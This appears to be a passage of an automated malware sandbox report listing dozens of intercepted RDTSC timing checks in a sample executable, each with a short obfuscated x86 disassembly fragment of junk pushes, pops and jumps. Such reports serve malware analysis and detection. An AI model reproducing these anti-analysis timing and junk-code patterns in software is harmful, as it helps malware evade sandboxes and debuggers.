Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A965EF second address: A96680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FDC00CE27B2h 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007FDC00CE27B1h 0x00000011 push 0000001Eh 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FDC00CE27A8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d call 00007FDC00CE27ABh 0x00000032 or edi, dword ptr [ebp+129E1B08h] 0x00000038 pop edx 0x00000039 nop 0x0000003a jnl 00007FDC00CE27C2h 0x00000040 push eax 0x00000041 js 00007FDC00CE27B8h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A96680 second address: A96684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A96684 second address: A96688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ACE82F second address: ACE840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FDC0050BD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ACE840 second address: ACE846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ACE9A5 second address: ACE9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD39F4 second address: AD3A06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD3A06 second address: AD3A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDC0050BD51h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD3A1D second address: AD3A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007FDC00CE27A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD422D second address: AD4232 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD4232 second address: AD425E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDC00CE27A6h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FDC00CE27A6h 0x00000016 jmp 00007FDC00CE27B6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD425E second address: AD427A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FDC0050BD48h 0x0000000c pushad 0x0000000d jmp 00007FDC0050BD4Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD46E3 second address: AD46F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDC00CE27A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD46F2 second address: AD46F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD4949 second address: AD4952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AD36FF second address: AD3720 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FDC0050BD52h 0x00000008 jg 00007FDC0050BD46h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ADBC14 second address: ADBC3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007FDC00CE27A6h 0x00000009 jmp 00007FDC00CE27B7h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ADE239 second address: ADE240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ADE240 second address: ADE246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ADE246 second address: ADE24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ADE24A second address: ADE29C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FDC00CE27AEh 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007FDC00CE27A6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 js 00007FDC00CE27C6h 0x0000001d jmp 00007FDC00CE27AFh 0x00000022 jmp 00007FDC00CE27B1h 0x00000027 jmp 00007FDC00CE27AFh 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ADE29C second address: ADE2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AE2DC6 second address: AE2DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AE2DD2 second address: AE2DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FDC0050BD55h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AE88A2 second address: AE88CA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDC00CE27A6h 0x00000008 jng 00007FDC00CE27A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FDC00CE27AAh 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007FDC00CE27A6h 0x0000001d jbe 00007FDC00CE27A6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AE88CA second address: AE88CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AE8E06 second address: AE8E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AE8E0F second address: AE8E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDC0050BD4Dh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A963F6 second address: A964AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jc 00007FDC00CE27BDh 0x0000000c jmp 00007FDC00CE27B7h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FDC00CE27A8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+12B9F453h] 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007FDC00CE27A8h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c or edi, dword ptr [ebp+129E2BFDh] 0x00000052 add eax, ebx 0x00000054 movsx edi, bx 0x00000057 push eax 0x00000058 jmp 00007FDC00CE27B1h 0x0000005d mov dword ptr [esp], eax 0x00000060 mov dword ptr [ebp+129E1E0Ch], edx 0x00000066 sub dword ptr [ebp+129E3150h], edi 0x0000006c push 00000004h 0x0000006e mov ecx, dword ptr [ebp+129E1E89h] 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 jmp 00007FDC00CE27AFh 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A964AB second address: A964B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AE9212 second address: AE921D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AE9C46 second address: AE9C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AED182 second address: AED188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AED46E second address: AED472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AED5B3 second address: AED5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AED703 second address: AED727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDC0050BD46h 0x0000000a jmp 00007FDC0050BD56h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AED857 second address: AED85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AED85B second address: AED87A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDC0050BD57h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF36F2 second address: AF370C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC00CE27B4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF3882 second address: AF388D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF388D second address: AF389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jno 00007FDC00CE27A6h 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF39FA second address: AF3A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FDC0050BD54h 0x0000000a jns 00007FDC0050BD46h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop eax 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jp 00007FDC0050BD4Ch 0x00000023 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF45DA second address: AF45EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDC00CE27ADh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF45EF second address: AF45F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF4F15 second address: AF4F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FDC00CE27A6h 0x0000000c popad 0x0000000d jl 00007FDC00CE27AEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF554D second address: AF556C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Eh 0x00000009 jmp 00007FDC0050BD4Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF556C second address: AF5576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AFA308 second address: AFA30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AFA30E second address: AFA312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AFA312 second address: AFA345 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FDC0050BD53h 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jmp 00007FDC0050BD55h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF94AE second address: AF94B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF94B2 second address: AF94CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF94CA second address: AF94EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC00CE27AEh 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FDC00CE27B0h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF94EF second address: AF94FF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDC0050BD4Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF94FF second address: AF9503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF9503 second address: AF9509 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF97EC second address: AF97F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF97F2 second address: AF97F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF996C second address: AF997C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDC00CE27A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF997C second address: AF998F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Eh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF998F second address: AF99A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jbe 00007FDC00CE27A6h 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF9E7B second address: AF9E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF9E81 second address: AF9E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF9E85 second address: AF9E8F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDC0050BD46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF9E8F second address: AF9E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FDC00CE27AAh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF9E9F second address: AF9EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FDC0050BD50h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF9EB5 second address: AF9EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF9EB9 second address: AF9EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AF9EC2 second address: AF9ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jl 00007FDC00CE27D5h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AFEDD1 second address: AFEDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FDC0050BD51h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AFEDEB second address: AFEDFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27ADh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B0528E second address: B05293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05293 second address: B052A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AEh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B052A6 second address: B052AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05402 second address: B0540F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B0540F second address: B05418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05418 second address: B05422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDC00CE27A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05422 second address: B05426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B0557C second address: B055AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FDC00CE27B3h 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDC00CE27B5h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B055AF second address: B055B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B056EB second address: B056F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDC00CE27A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B056F5 second address: B05718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Bh 0x00000007 jmp 00007FDC0050BD54h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05BA9 second address: B05BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05BAD second address: B05BB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05BB3 second address: B05BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FDC00CE27ACh 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FDC00CE27BCh 0x00000015 jg 00007FDC00CE27BBh 0x0000001b jmp 00007FDC00CE27B3h 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05DA8 second address: B05DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05DAD second address: B05DB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B06450 second address: B06465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B06465 second address: B06483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDC00CE27B8h 0x0000000b rdtsc
